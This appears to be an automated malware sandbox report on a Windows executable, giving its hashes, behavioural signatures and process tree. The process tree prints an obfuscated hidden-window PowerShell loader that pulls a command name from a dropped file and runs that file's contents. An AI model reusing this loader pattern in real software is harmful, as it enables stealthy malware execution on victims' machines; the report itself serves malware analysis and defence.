Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20231201-en -
resource tags
arch:x64arch:x86image:win7-20231201-enlocale:en-usos:windows7-x64system -
submitted
07/12/2023, 19:22
Static task
static1
Behavioral task
behavioral1
Sample
581fdf9e0a55e6121dfa4b0f662af19fe323492170a19b4181fc4bc941424b1aexe.exe
Resource
win7-20231201-en
Behavioral task
behavioral2
Sample
581fdf9e0a55e6121dfa4b0f662af19fe323492170a19b4181fc4bc941424b1aexe.exe
Resource
win10v2004-20231127-en
General
-
Target
581fdf9e0a55e6121dfa4b0f662af19fe323492170a19b4181fc4bc941424b1aexe.exe
-
Size
757KB
-
MD5
66bca9391d3610d5f16e8cc8db45a962
-
SHA1
587171885e9dd7e76ec95a29827af6766f0acba5
-
SHA256
581fdf9e0a55e6121dfa4b0f662af19fe323492170a19b4181fc4bc941424b1a
-
SHA512
887c958342e2281b7b593b92d1fc7e4d00b0891e16672a6433ff3475df2bf4809b6acff84fc39b38a6fba067110ee00553ece48a2ad1e9630603f702289f3885
-
SSDEEP
12288:g2Qw6UNMMIowZWWa7HcN+FlB5wGYRveB0ud4n8KyPHkO7Eb:g9w6UNMvowZPmHcgFv5whemnTuEP
Malware Config
Signatures
-
Loads dropped DLL 1 IoCs
pid Process 2332 581fdf9e0a55e6121dfa4b0f662af19fe323492170a19b4181fc4bc941424b1aexe.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2820 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2820 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2332 wrote to memory of 2820 2332 581fdf9e0a55e6121dfa4b0f662af19fe323492170a19b4181fc4bc941424b1aexe.exe 29 PID 2332 wrote to memory of 2820 2332 581fdf9e0a55e6121dfa4b0f662af19fe323492170a19b4181fc4bc941424b1aexe.exe 29 PID 2332 wrote to memory of 2820 2332 581fdf9e0a55e6121dfa4b0f662af19fe323492170a19b4181fc4bc941424b1aexe.exe 29 PID 2332 wrote to memory of 2820 2332 581fdf9e0a55e6121dfa4b0f662af19fe323492170a19b4181fc4bc941424b1aexe.exe 29
Processes
-
C:\Users\Admin\AppData\Local\Temp\581fdf9e0a55e6121dfa4b0f662af19fe323492170a19b4181fc4bc941424b1aexe.exe"C:\Users\Admin\AppData\Local\Temp\581fdf9e0a55e6121dfa4b0f662af19fe323492170a19b4181fc4bc941424b1aexe.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$genom=Get-Content 'C:\Users\Admin\AppData\Local\Temp\Semplices\Amortisabel\sphygmomanometric.Mat';$Tintometric14=$genom.SubString(70960,3);.$Tintometric14($genom)"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2820
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6KB
MD53d366250fcf8b755fce575c75f8c79e4
SHA12ebac7df78154738d41aac8e27d7a0e482845c57
SHA2568bdd996ae4778c6f829e2bcb651c55efc9ec37eeea17d259e013b39528dddbb6
SHA51267d2d88de625227ccd2cb406b4ac3a215d1770d385c985a44e2285490f49b45f23ce64745b24444e2a0f581335fda02e913b92781043e8dfd287844435ba9094